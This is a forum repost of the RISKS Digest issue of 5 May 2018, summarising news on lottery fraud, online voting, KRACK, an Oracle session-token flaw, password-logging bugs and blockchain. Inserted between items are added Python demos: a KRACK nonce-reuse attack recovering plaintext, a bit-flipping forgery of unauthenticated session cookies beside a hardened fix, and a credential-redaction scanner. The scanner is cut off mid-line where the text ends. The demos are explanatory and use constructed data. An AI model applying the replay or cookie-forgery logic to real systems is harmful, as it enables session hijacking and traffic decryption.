Risks Digest

Discussion in 'Gator Bytes' started by LakeGator, Apr 25, 2015.

  1. LakeGator

    Risks Digest 30.68

    RISKS List Owner

    May 5, 2018 8:34 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 5 May 2018 Volume 30 : Issue 68

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Iowa Lottery fraud resolved (PGN on NYTimes item)
    "Online voting is impossible to secure. So why are some governments
    using it?" (Porup)
    Lightning Struck Her Home. Then Her Brain Implant Stopped Working (NY Times)
    KRACK Wi-Fi vulnerability can expose medical devices, patient records
    (Charlie Osborne)
    "A critical security flaw in popular industrial software put power plants
    at risk" (Zack Whittaker)
    "Oracle Access Manager security bug so serious it let anyone access
    protected data" (Liam Tung)
    How not to announce a loss of secure information (SMH)
    Why Silicon Valley can't fix itself (The Guardian)
    "Google Maps user? Beware attackers using URL-sharing to send
    you to shady sites" (Liam Tung)
    China's bungled drone display breaks world record (via BBC.com)
    When a stranger takes your face, Facebook failed crackdown on fake accounts
    (WashPo)
    The Era of Fake Video Begins (Franklin Foer)
    Souped-up smartphones, robots to help police fight crime more effectively
    (Straits Times)
    "GitHub says bug exposed some plaintext passwords" (ZDNet)
    "Gaming: The System" (NY Times)
    France seizes France.com from man who's had it since 1994, so he sues
    (Ars Technica)
    Transparent Eel-Like Soft Robot Can Swim Silently Underwater (ACM Technews)
    He Drove a Tesla on Autopilot From the Passenger Seat. The Court
    Was Not Amused. (NYTimes)
    Is My Not-So-Smart House Watching Me? (NYTimes)
    Following the Trail of Online Ads, Wherever It Leads (NYTimes)
    Criminals Used Flying Robots to Disrupt FBI Hostage Operation
    (Fortune)
    Facebook's dating service is a chance to meet the catfisher, advertiser,
    or scammer of your dreams (WashPo)
    Blockchain Will Be Theirs, Russian Spy Boasted at Conference
    (Nathaniel Popper)
    Blockchain is not only crappy technology but a bad vision for
    the future (Kai Stinchcombe, John Levine)
    Keeping your *Twitter* account secure (Gabe Goldberg)
    Against Trendism: how to defang the social media disinformation complex
    (Medium via John Ohno)
    Letter to *Consumer Reports* responding to June article about connected cars
    (Gabe Goldberg)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Thu, 3 May 2018 14:06:09 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Iowa Lottery fraud resolved (NYTimes)

    The Iowa Hot Lotto fraud scandal has now been resolved. A programmer who
    happened to be the info-security head for the Multi-State Lottery
    Association managed to slip a piece of code into the proprietary system
    that changed the randomness on just three chosen days in the year. This
    enabled a would-be payoff of $14.3M. The collaborators were detected when
    they attempted to collect.
    The Man Who Cracked the Lottery

    This is reminiscent of the Harrah's Tahoe six-slot-machine progressive
    payoff noted way back in RISKS-1.01 (where a shill chosen to collect the
    payoff never showed up, because he had a record and feared exposure [perhaps
    he was in a witness-protection program?], and the more recent Breeders' Cup
    off-track pick-six $3M scam (RISKS-22.33,38-40) -- in which bets on the
    first four races were altered by an insider after those races were over, and
    the next races wildcarded to cover all possible horses, but in a system in
    which the bets were never transmitted until after the fourth race (to save
    bandwidth?).

    The combination of proprietary code that cannot be inspected externally and
    the insider being the IT security person should recall the corresponding
    situation with proprietary election systems that can be hacked or rigged by
    insiders. [And then read Gene Wirchenko's next item! PGN]

    ------------------------------

    Date: Thu, 03 May 2018 09:01:31 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Online voting is impossible to secure. So why are some governments
    using it?" (Porup)

    J.M. Porup, CSO, 2 May 2018
    Online voting is impossible to secure. So why are some governments using it?

    If you thought electronic voting machines were insecure, wait until you meet
    online voting.

    selected text:

    A researcher at the University of Melbourne in Australia, Teague has twice
    demonstrated massive security flaws in the online voting systems used in
    state elections in Australia -- including one of the largest deployments of
    online voting ever, the 2015 New South Wales (NSW) state election, with
    280,000 votes cast online.

    The response? Official complaints about her efforts to university
    administrators, and a determination by state election officials to keep
    using online voting, despite ample empirical proof, she says, that these
    systems are not secure.

    While insecure voting machines have received most of the attention since the
    2016 U.S. presidential election, states and municipalities continue to use
    -- even enthusiastically adopt -- web-based online voting, including 31
    states in the U.S., two provinces in Canada, and two states in Australia.
    Wales in the UK is pushing hard for online voting. The country of Estonia
    uses online voting for its national elections.

    Security researchers point out flaws; election officials get angry and
    ignore security issues that threaten the integrity of the voting
    results. Teague's story repeats itself around the world.

    The NSW state election of 2015 was so insecure that one seat in the upper
    house of the state parliament may have been decided by hacked votes. In
    response to the scandal, the electoral commission went to great lengths to
    avoid transparency regarding the security issues Teague and her team
    reported, and only revealed the true nature of the problem under close
    questioning in state parliament a year later.

    Before the election, the state electoral commission told the Australian
    Broadcasting Corporation (ABC) that "People's vote is completely secret...
    It's fully encrypted and safeguarded, it can't be tampered with." Yet it
    took researchers only a few days to identify fatal flaws in the online
    voting web application that could have easily been used to spy on and even
    modify every single vote cast online, and to do so in an undetectable
    manner.

    The NSW electoral commission initially reported after the election that
    there were no anomalies seen while using the online voting platform, but a
    year later, under questioning in state parliament, admitted that there were,
    in fact, significant anomalies reported by voters. More than 600 voters who
    attempted to verify their votes using a rudimentary telephone-based system
    were unable to do so -- a 10 percent failure rate, enough to call into
    question the voting result of the state election. "That to me is the bottom
    line," Teague says. "The really important thing is that we didn't find out
    the truth at the time."

    ------------------------------

    Date: Fri, 04 May 2018 08:12:36 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Lightning Struck Her Home. Then Her Brain Implant Stopped Working
    (NY Times)

    Lightning Struck Her Home. Then Her Brain Implant Stopped Working.

    ------------------------------

    Date: Tue, 01 May 2018 09:38:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Charlie Osborne)

    Charlie Osborne for Zero Day, 1 May 2018
    KRACK Wi-Fi vulnerability can expose medical devices, patient records | ZDNet

    selected text:

    Medical devices produced by Becton, Dickinson and Company (BD) are
    vulnerable to the infamous KRACK bug, potentially exposing patient records.
    Discovered in October, KRACK, which stands for Key Reinstallation Attack,
    exploits a flaw in the Wi-Fi Protected Access II (WPA2) protocol which is
    used to secure modern wireless networks.

    If exploited, KRACK gives threat actors the key required to join wireless
    networks which would otherwise require a password for authentication. Once
    they have joined, they can snoop on network traffic, perform
    Man-in-The-Middle (MiTM) attacks, hijack connections, and potentially send
    out crafted, malicious network packets.

    In a security bulletin, BD said that successful exploit in a select range of
    products could also lead to patient record changes or exfiltration, as well
    as major IT disruptions.

    ------------------------------
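
The quoted summary describes KRACK's impact. The mechanism behind it, as published by the researchers who found it, is a replay of message 3 of the WPA2 4-way handshake that makes the client reinstall a key it is already using, which resets the per-packet nonce counter. The following is an added example, not code from the ZDNet article or from BD's bulletin: it models that reset and shows why one repeated nonce under a counter-mode cipher leaks plaintext to a passive listener who never learns the key. The HMAC-SHA256 counter-mode keystream stands in for CCMP's AES-CTR (an assumption made to avoid third-party dependencies; the reuse property is the same for any counter-mode or stream cipher), and the packet contents are constructed.

```python
"""
Model of a key-reinstallation (KRACK-style) nonce reset and its consequence.

Assumptions (not from the article): the keystream is HMAC-SHA256 in counter
mode standing in for CCMP's AES-CTR; packets are constructed byte strings,
not 802.11 frames.
"""
import hashlib
import hmac
import os


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: PRF(key, nonce || counter) blocks, truncated."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Station:
    """Simplified Wi-Fi client: one pairwise key (PTK) and the packet number
    (PN) that feeds the per-packet nonce. PN must never repeat under one key."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.ptk = None
        self.pn = 0

    def handshake_msg3(self, ptk: bytes) -> bool:
        """Handle message 3 of the 4-way handshake (possibly a replay)."""
        if self.patched and self.ptk == ptk:
            return False          # fixed clients do not reinstall an in-use key
        self.ptk = ptk
        self.pn = 0               # key installation resets the nonce counter
        return True

    def send(self, plaintext: bytes):
        nonce = self.pn.to_bytes(6, "big")
        self.pn += 1
        return nonce, xor(plaintext, keystream(self.ptk, nonce, len(plaintext)))


def attacker_recovers(captures, known_plaintext: bytes):
    """Passive attacker on the air: given two ciphertexts under the same
    (key, nonce) and the plaintext of the first, c1 ^ c2 ^ p1 == p2."""
    seen = {}
    for nonce, ct in captures:
        if nonce in seen:
            c1 = seen[nonce]
            n = min(len(c1), len(ct), len(known_plaintext))
            return xor(xor(c1[:n], ct[:n]), known_plaintext[:n])
        seen[nonce] = ct
    return None


# Constructed traffic: a predictable first packet and a secret second one.
KNOWN = b"GET / HTTP/1.1\r\nHost: device.example\r\n"
SECRET = b"Authorization: Bearer s3cr3t-token\r\n"


def run(patched: bool):
    """Returns what the attacker recovers of SECRET (None if nothing)."""
    ptk = os.urandom(32)                    # normally derived by the handshake
    sta = Station(patched)
    sta.handshake_msg3(ptk)                 # legitimate message 3: key installed
    captures = [sta.send(KNOWN)]
    sta.handshake_msg3(ptk)                 # attacker replays message 3
    captures.append(sta.send(SECRET))       # vulnerable client reuses PN = 0
    return attacker_recovers(captures, KNOWN)


if __name__ == "__main__":
    print("vulnerable:", run(patched=False))
    print("patched:   ", run(patched=True))
```

The attacker here holds no key material at all; the first packet is guessable (protocol headers usually are), and the keystream cancels out between the two captures. On a medical device whose first frames after association are fixed protocol handshakes, that is exactly the known-plaintext an attacker needs. The client-side fix is the one the patched branch models: once a key is installed, a retransmitted message 3 must not reinstall it.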

    Date: Wed, 02 May 2018 08:59:05 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A critical security flaw in popular industrial software put power
    plants at risk" (Zack Whittaker)

    Zack Whittaker for Zero Day, 2 May 2018
    The bug in the industrial control software could leave power and
    manufacturing plants exposed. A severe vulnerability in a widely used
    industrial control software could have been used to disrupt and shut down
    power plants and other critical infrastructure.
    Industrial software used to run power plants was easily hackable

    ------------------------------

    Date: Thu, 03 May 2018 09:15:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Oracle Access Manager security bug so serious it let anyone
    access protected data" (Liam Tung)

    Liam Tung, ZDNet, 3 May 2018
    The moral? Don't roll your own crypto, security researcher tells Oracle.
    Oracle Access Manager security bug so serious it let anyone access protected data | ZDNet

    selected text:

    A bug that Oracle recently patched broke the main functionality of Oracle
    Access Manager (OAM), which should only give authorized users access to
    protected enterprise data.

    However, researchers at Austrian security firm SEC-Consult found a flaw in
    OAM's cryptographic format that allowed them to create session tokens for
    any user, which the attacker could use to impersonate any legitimate user
    and access web apps that OAM should be protecting.

    "What's more, the session cookie crafting process lets us create a session
    cookie for an arbitrary username, thus allowing us to impersonate any user
    known to the OAM."

    ------------------------------
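
The class of bug described above, a session cookie an attacker can mint for any username, is what you get when a token is encrypted but nothing binds the ciphertext to the server's secret. The following is an added illustration of that class; it is not Oracle Access Manager's cookie format (the article does not describe it) and the keys, cookie layout and session strings are all constructed here. It shows the malleable scheme beside an encrypt-then-MAC version that rejects the same forgery.

```python
"""
Illustration of the "craft a cookie for an arbitrary user" bug class.
A cookie that is encrypted but not authenticated can be rewritten by anyone
holding a valid cookie of their own. Constructed example; not OAM's format.
"""
import hashlib
import hmac
import os

# Assumption: server-side secrets, never sent to clients. Separate keys for
# encryption and MAC, derived from one master secret.
_MASTER = os.urandom(32)
ENC_KEY = hashlib.sha256(b"enc" + _MASTER).digest()
MAC_KEY = hashlib.sha256(b"mac" + _MASTER).digest()
NONCE_LEN, TAG_LEN = 16, 32


def _keystream(key: bytes, nonce: bytes) -> bytes:
    """One 32-byte keystream block, enough for the short session strings here."""
    return hashlib.sha256(key + nonce).digest()


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- weak: encrypt only; nothing ties the ciphertext to the server's key ---
def weak_issue(session: bytes) -> bytes:
    nonce = os.urandom(NONCE_LEN)
    return nonce + _xor(session, _keystream(ENC_KEY, nonce))


def weak_verify(cookie: bytes) -> bytes:
    nonce, body = cookie[:NONCE_LEN], cookie[NONCE_LEN:]
    return _xor(body, _keystream(ENC_KEY, nonce))   # decrypts forgeries too


# --- hardened: encrypt-then-MAC, tag checked before anything is decoded ---
def strong_issue(session: bytes) -> bytes:
    nonce = os.urandom(NONCE_LEN)
    body = _xor(session, _keystream(ENC_KEY, nonce))
    tag = hmac.new(MAC_KEY, nonce + body, hashlib.sha256).digest()
    return nonce + body + tag


def strong_verify(cookie: bytes):
    nonce, body, tag = cookie[:NONCE_LEN], cookie[NONCE_LEN:-TAG_LEN], cookie[-TAG_LEN:]
    expected = hmac.new(MAC_KEY, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None                                  # reject; never decrypt
    return _xor(body, _keystream(ENC_KEY, nonce))


def forge(cookie: bytes, own_session: bytes, target_session: bytes) -> bytes:
    """Attacker: knows the plaintext layout of their own cookie and XORs the
    body with (own ^ target). No key is needed; the keystream cancels out."""
    assert len(own_session) == len(target_session)
    nonce = cookie[:NONCE_LEN]
    body = cookie[NONCE_LEN:NONCE_LEN + len(own_session)]
    tail = cookie[NONCE_LEN + len(own_session):]     # MAC tag, if present, untouched
    return nonce + _xor(body, _xor(own_session, target_session)) + tail


# Constructed session strings of equal length (the attacker's own, and the target).
OWN = b"user=mallory;role=guest"
TARGET = b"user=admin01;role=admin"


def demo():
    """(what the weak server accepts, what the hardened server accepts)."""
    return (weak_verify(forge(weak_issue(OWN), OWN, TARGET)),
            strong_verify(forge(strong_issue(OWN), OWN, TARGET)))


if __name__ == "__main__":
    print(demo())
```

The forged cookie decrypts cleanly under the weak scheme because XOR-style encryption preserves bit flips; the hardened verifier fails the tag comparison first and never looks at the body. In production you would not assemble this from SHA-256 and HMAC by hand either: the researchers' moral, quoted above, points at a vetted authenticated-encryption mode from a standard library, with the expiry and user binding inside the authenticated payload.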

    Date: Fri, 4 May 2018 11:08:29 +1000
    From: Dave Horsfall <da...@horsfall.org>
    Subject: How not to announce a loss of secure information (SMH)

    The Commonwealth Bank of Australia, who are in enough trouble as it is with
    major scandals, did not tell its customers that some "tapes" went missing on
    their way to be destroyed.

    Almost 20 million bank account records lost by Commonwealth Bank

    ``The tapes contained customer names, addresses, account numbers and
    transaction details from 19.8 million accounts spanning 2000 to early
    2016. They did not contain passwords, PINs or other data which could be
    used to enable account fraud, CBA said in a statement on Wednesday night
    after BuzzFeed broke the story.''

    So, plenty of account numbers and transaction details etc, but we've got
    nothing to worry about, right? Perhaps they should be reading RISKS...

    Dave Horsfall VK2KFU North Gosford NSW 2250 Australia

    ------------------------------

    Date: Sat, 5 May 2018 11:04:01 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Why Silicon Valley can't fix itself (The Guardian)

    Tech insiders have finally started admitting their mistakes -- but the
    solutions they are offering could just help the big players get even more
    powerful.

    http://www.theguardian.com/news/2018/may/03/why-silicon-valley-cant-fix-itself-tech-humanism

    ------------------------------

    Date: Wed, 02 May 2018 09:02:16 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google Maps user? Beware attackers using URL-sharing to send
    you to shady sites" (Liam Tung)

    Liam Tung, ZDNet, 2 May 2018

    The Google Maps URL-sharing feature allows scammers to send victims to any
    site they choose. Scammers are using the Google Maps URL-sharing feature to
    direct victims not to Maps but any shady website the crooks want. According
    to security firm Sophos, scammers are taking advantage of the fact the URL
    sharing feature in Google Maps isn't an official product and lacks a
    mechanism to report scammy links.

    That's unlike Google's soon-to-be retired URL shortener goo.gl, which can be
    used to conceal links to malware or phishing sites, but also has a simple
    way for recipients to report scam links.

    Google Maps user? Beware attackers using URL-sharing to send you to shady sites | ZDNet

    ------------------------------

    Date: Thu, 03 May 2018 09:29:21 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: China's bungled drone display breaks world record (via BBC.com)



    Swarm intelligence is complicated to coordinate. "I believe everything
    happens for a reason. Usually, the reason is that somebody screwed up."
    (From Maxine -- the Hallmark Shoebox card character on 23JUN2007).

    ------------------------------

    Date: Sat, 05 May 2018 00:54:41 +0000
    From: Richard M Stein <rms...@ieee.org>
    Subject: When a stranger takes your face, Facebook failed crackdown on fake
    accounts (WashPo)

    When a stranger takes your face: Facebook’s failed crackdown on fake accounts

    Perhaps a biometric supplement would boost authentication accuracy?

    Would be good to learn Facebook user profile photo match rate against the
    FBI's NCIC to test hit/miss rate. How many convicted felons or fugitives use
    Facebook? Given this information, update T&Cs to hedge against
    authentication theft.

    ------------------------------

    Date: Sun, 29 Apr 2018 23:41:00 +0000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: The Era of Fake Video Begins (Franklin Foer)

    Franklin Foer, *The Atlantic*, May 2018 Issue
    The digital manipulation of video may make the current era of fake news seem
    quaint.
    The Era of Fake Video Begins

    EXCERPT:

    In a dank corner of the Internet, it is possible to find actresses from Game
    of Thrones or Harry Potter engaged in all manner of sex acts. Or at least to
    the world the carnal figures look like those actresses, and the faces in the
    videos are indeed their own. Everything south of the neck, however, belongs
    to different women. An artificial intelligence has almost seamlessly
    stitched the familiar visages into pornographic scenes, one face swapped for
    another. The genre is one of the cruelest, most invasive forms of identity
    theft invented in the Internet era. At the core of the cruelty is the acuity
    of the technology: A casual observer can't easily detect the hoax.

    This development, which has been the subject of much hand-wringing in the
    tech press, is the work of a programmer who goes by the nom de hack
    *deepfakes*. And it is merely a beta version of a much more ambitious
    project. One of deepfakes' compatriots told Vice's Motherboard site in
    January that he intends to democratize this work. He wants to refine the
    process, further automating it, which would allow anyone to transpose the
    disembodied head of a crush or an ex or a co-worker into an extant
    pornographic clip with just a few simple steps. No technical knowledge would
    be required. And because academic and commercial labs are developing even
    more-sophisticated tools for non-pornographic purposes -- algorithms that
    map facial expressions and mimic voices with precision -- the sordid fakes
    will soon acquire even greater verisimilitude. The Internet has always
    contained the seeds of postmodern hell. Mass manipulation, from clickbait to
    Russian bots to the addictive trickery that governs Facebook's News Feed, is
    the currency of the medium. It has always been a place where identity is
    terrifyingly slippery, where anonymity breeds coarseness and confusion,
    where crooks can filch the very contours of selfhood. In this respect, the
    rise of deepfakes is the culmination of the Internet's history to date --
    and probably only a low-grade version of what's to come.

    ------------------------------

    Date: Thu, 03 May 2018 17:19:08 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Souped-up smartphones, robots to help police fight crime more
    effectively (Straits Times)

    http://www.straitstimes.com/singapo...s-to-help-police-fight-crime-more-effectively

    "New technology unveiled on Thursday (May 3) will make it easier for the
    police to fight crime and enforce the law.

    "Souped-up smartphones will allow officers to respond faster and more
    effectively to incidents, as well as call up key information on a
    case. Robots on patrol can aid in the detection of suspicious activities,
    and handheld scanners will make it easier to take real-time 3D scans of
    crime scenes to aid in crime solving."

    The article has several photos (showing 3 unique autonomous patrol unit
    configurations) and lists the autonomous patrol unit's h/w specification.

    ------------------------------

    Date: Wed, 02 May 2018 08:55:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "GitHub says bug exposed some plaintext passwords" (ZDNet)

    http://www.zdnet.com/article/github-says-bug-exposed-account-passwords/

    Zack Whittaker for Zero Day, 1 May 2018
    A small but unspecified number of GitHub staff could have seen plaintext
    passwords. GitHub has said a bug exposed some user passwords -- in
    plaintext.

    ------------------------------

    Date: Mon, 30 Apr 2018 09:57:26 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: "Gaming: The System" (NY Times)

    https://www.nytimes.com/2018/04/28/opinion/sunday/gaming-the-system.htm

    ``My gamified life may be nutty and sad, but it doesn't hurt anyone. At
    least that's what I thought until a few months ago, when my new car
    insurance company, Liberty Mutual, invited me to join a program its
    website describes this way: Using a small device that observes your
    driving habits, we'll notice the safe choices you're making on the road
    and reward you for them. The company promised a rate reduction of at
    least 5 percent and up to 30 percent, based on driving performance over a
    three-month period. Best of all, an app would let me track the size of my
    discount in real time.''

    Technology gamifies our lives as consumers -- a dopamine burst sustains
    product interest boosted by a loyalty discount, while data capture
    algorithms gleefully score your profile. Several economics Nobel prizes
    attest to reward incentive influence on consumer behavior. Is gamification
    deployed by social media bots that promote political candidates? Is
    gamification deployed by industries opposing environmental or health
    legislation? Has gamification emerged as a new public health threat
    exploiting the brain's addiction channel?

    See RISKS-29.21 for the first mention of 'gamification' in comp.risks: "The
    brain-imaging experiment showed how the students concentrated and learned
    better when studying was part of a game."

    ------------------------------

    Date: Mon, 30 Apr 2018 00:38:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: France seizes France.com from man who's had it since 1994, so he sues
    (Ars Technica)

    http://arstechnica.com/tech-policy/...com-from-man-whos-had-it-since-94-so-he-sues/

    Nice domain you have there. Would be a shame if anything happened to it...

    ------------------------------

    Date: Wed, 2 May 2018 12:31:36 -0400
    From: ACM TechNews <technew...@acm.org>
    Subject: Transparent Eel-Like Soft Robot Can Swim Silently Underwater

    University of California, San Diego (04/24/18) Ioana Patringenaru
    via ACM TechNews, Wednesday, 2 May 2018

    Researchers at the University of California, San Diego and the University of
    California, Berkeley have created a nearly-transparent eel-like robot that
    can swim silently in salt water using artificial muscles. Critical to the
    new technology is the use of the salt water in which the robot swims, to
    generate the electrical forces that propel it. The robot delivers negative
    charges to the water just outside itself, and positive charges inside the
    robot to trigger its muscles to bend, creating the robot's swimming motion.
    The charges carry very little current, making them safe for marine life. The
    technology is an important step toward a future when soft robots can swim in
    the ocean alongside fish and invertebrates without harming them, the
    researchers say.

    http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1b1b0x215c58x070332&

    [The technology is fascinating, with lots of opportunities here. Risks?
    Sharks might devour but not digest the robots, heat-sensing creatures
    might cuddle up to them, or even befriend them, or redirect robots that
    are stealthy torpedoes to another target! PGN]

    ------------------------------

    Date: Sun, 29 Apr 2018 17:31:40 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: He Drove a Tesla on Autopilot From the Passenger Seat. The Court
    Was Not Amused. (NYTimes)

    http://www.nytimes.com/2018/04/29/world/europe/uk-autopilot-driver-no-hands.html

    The British man was barred from driving for 18 months after being videotaped
    sitting with his hands behind his head, cruising at 40 miles per hour in
    *heavy* traffic.

    ------------------------------

    Date: Sun, 29 Apr 2018 17:32:05 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is My Not-So-Smart House Watching Me? (NYTimes)

    http://www.nytimes.com/2018/04/27/realestate/is-my-not-so-smart-house-watching-me.html

    Smart-house technology has made it easier to turn on the lights and set the
    thermostat, but sometimes objects go rogue.

    ------------------------------

    Date: Sun, 29 Apr 2018 17:32:55 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Following the Trail of Online Ads, Wherever It Leads (NYTimes)

    http://www.nytimes.com/2018/04/18/technology/personaltech/online-advertising-tracking.html

    Sapna Maheshwari, who covers advertising for The Times, discusses how she
    tracks the online ads that track us.

    ------------------------------

    Date: Fri, 4 May 2018 23:50:14 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Criminals Used Flying Robots to Disrupt FBI Hostage Operation
    (Fortune)

    Criminals have discovered another use for drones -- to distract and spy on
    law enforcement.

    They recently tried to thwart an FBI hostage rescue, Joe Mazel, chief of the
    FBI's operational technology law unit, said this week, according to a report
    by news site Defense One.

    Mazel, speaking at the AUVSI Xponential drone conference in Denver, said
    that criminals launched a swarm of drones at an FBI rescue team during an
    unspecified hostage situation near a large U.S. city, confusing law
    enforcement. The criminals flew the drones at high speed over the heads of
    FBI agents to drive them away while also shooting video that they then
    uploaded to YouTube as a way to alert other nearby criminal members about
    law enforcement's location.

    http://fortune.com/2018/05/04/drone-fbi-hostage-criminals/

    ------------------------------

    Date: Thu, 3 May 2018 19:44:28 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facebook's dating service is a chance to meet the catfisher,
    advertiser, or scammer of your dreams (WashPo)

    via NNSquad

    http://www.washingtonpost.com/news/...tfisher-advertiser-or-scammer-of-your-dreams/

    The love-seeking singles of Facebook's new dating service, privacy experts
    say, may not be prepared for what they'll encounter: sham profiles,
    expanded data gathering and a new wave of dating fraud. Facebook -- under
    fire for viral misinformation, fake accounts and breaches of tr[sic]

    ------------------------------

    Date: Sun, 29 Apr 2018 17:02:35 -1000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: Blockchain Will Be Theirs, Russian Spy Boasted at Conference
    (Nathaniel Popper)

    Nathaniel Popper, The New York Times, 29 Apr 2018

    http://www.nytimes.com/2018/04/29/technology/blockchain-iso-russian-spies.html

    EXCERPT:

    Russian interest in the technology surrounding virtual currencies, like in
    this crypto-mining operation in Moscow, is growing. Last year, employees of
    Russia's spy agency attended a meeting where international standards for the
    so-called blockchain were discussed. Andrey Rudakov/Bloomberg

    SAN FRANCISCO -- Last year, representatives of 25 countries met in Tokyo to
    work on setting international standards for the blockchain, the technology
    that was introduced by the virtual currency Bitcoin and has ignited intense
    interest in corporate and government circles.

    Some of the technologists at the meeting of the International Standards
    Organization were surprised when they learned that the head of the Russian
    delegation, Grigory Marshalko, worked for the FSB, the intelligence agency
    that is the successor to the KGB.

    They were even more surprised when they asked the FSB agent why the Russians
    were devoting such resources to the blockchain standards.

    ``Look, the Internet belongs to the Americans -- but blockchain will belong
    to us,'' he said, according to one delegate who was there. The Russian added
    that two other members of his country's four-person delegation to the
    conference also worked for the FSB.

    Another delegate who had a separate conversation with the head of the
    Russian group remembers a slightly different wording: ``The Internet
    belonged to America. The blockchain will belong to the Russians.''

    Both of the delegates who recounted their conversations did so on the
    condition of anonymity, because discussions at the International Standards
    Organization are supposed to be confidential. Neither the Russian
    organizations overseeing the delegation to the ISO nor the Russian delegates
    responded to requests for comment.

    ------------------------------

    Date: Sat, 5 May 2018 09:22:23 -0400
    From: "Dave Farber" <far...@gmail.com>
    Subject: Blockchain is not only crappy technology but a bad vision for
    the future (Kai Stinchcombe)

    Kai Stinchcombe, Medium, 5 Apr 2018 [Via Dave's IP distribution]


    Blockchain is not only crappy technology but a bad vision for the future.
    Its failure to achieve adoption to date is because systems built on trust,
    norms, and institutions inherently function better than the type of
    no-need-for-trusted-parties systems blockchain envisions. That's permanent:
    no matter how much blockchain improves it is still headed in the wrong
    direction.

    This December I wrote a widely-circulated article on the inapplicability of
    blockchain to any actual problem. People objected mostly not to the
    technology argument, but rather hoped that decentralization could produce
    integrity. [...]

    ------------------------------

    Date: May 5, 2018 at 1:49:22 PM EDT
    From: "John Levine" <jo...@iecc.com>
    Subject: Blockchain is not only crappy technology but a bad vision for
    the future (Re: Stinchcombe)

    Well, gee, everything he says is self-evidently true.

    Bitcoins remind me of a story from the late chair of the Princeton U.
    astronomy department. In 1950 Immanuel Velikovsky published "Worlds in
    Collision", a controversial best selling book that claimed that 3500 years
    ago Venus and Mars swooped near the earth, causing catastrophes that were
    passed down in religions and mythologies.

    The astronomer was talking to an anthropologist at a party and the book came
    up.

    "The astronomy is nonsense," said the astronomer, "but the anthropology is
    really interesting."

    "Funny," replied the anthropologist, "I was going to say almost the same
    thing."

    Bitcoin and blockchains lash together an unusual distributed database with a
    libertarian economic model. People who understand databases realize that
    blockchains only work as long as there are incentives to keep a sufficient
    number of non-colluding miners active, preventing collusion is probably
    impossible, and that scaling blockchains up to handle an interesting
    transaction rate is very hard, but that no-government money is really
    interesting.

    People who understand economics and particularly economic history understand
    why central banks manage their currencies, thin markets like the ones for
    cryptocurrencies are easy to corrupt, and a payment system needs a way to
    undo bogus payments, but that free permanent database ledger is really
    interesting.

    Not surprisingly, the most enthusiastic bitcoin and blockchain proponents
    are the ones who understand neither databases nor economics.

    ------------------------------

    Date: Thu, 3 May 2018 22:56:28 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Keeping your *Twitter* account secure

    Or not.

    http://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html

    When you set a password for your Twitter account, we use technology that
    masks it so no one at the company can see it. We recently identified a bug
    that stored passwords unmasked in an internal log. We have fixed the bug,
    and our investigation shows no indication of breach or misuse by anyone.

    ------------------------------
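
The GitHub item earlier in this issue and the Twitter notice above describe the same failure: a credential that was correctly hashed at rest was written, unmasked, to an internal log by some other code path. The following is an added example (the logger, field names and log lines are constructed here, not GitHub's or Twitter's) of the two controls a practitioner wants against that: redaction of credential-shaped fields before a record is serialised, and a scan over existing log lines to find what already leaked.

```python
"""
Two controls for the "passwords ended up in a log" failure mode: redact
credential-like fields before serialising, and scan existing lines for leaks.
Constructed example; logger, field names and sample lines are hypothetical.
"""
import json
import re

SENSITIVE_KEY = re.compile(
    r"pass(word|wd)?|secret|token|api[_-]?key|authorization|cookie|session", re.I)
PLACEHOLDER = "[REDACTED]"


def redact(obj):
    """Recursively mask values under credential-like keys (dicts, lists, scalars)."""
    if isinstance(obj, dict):
        return {k: PLACEHOLDER if SENSITIVE_KEY.search(str(k)) else redact(v)
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact(v) for v in obj]
    return obj


def log_request(path: str, form: dict, headers: dict, emit) -> str:
    """Hypothetical request logger. emit(line) is the sink (file, syslog, ...);
    every record passes through redact() before it is serialised."""
    record = {"event": "http_request", "path": path,
              "form": redact(form), "headers": redact(headers)}
    line = json.dumps(record, sort_keys=True)
    emit(line)
    return line


# Matches key=value, key: value and JSON "key": "value" shapes, case-insensitive.
LEAK = re.compile(
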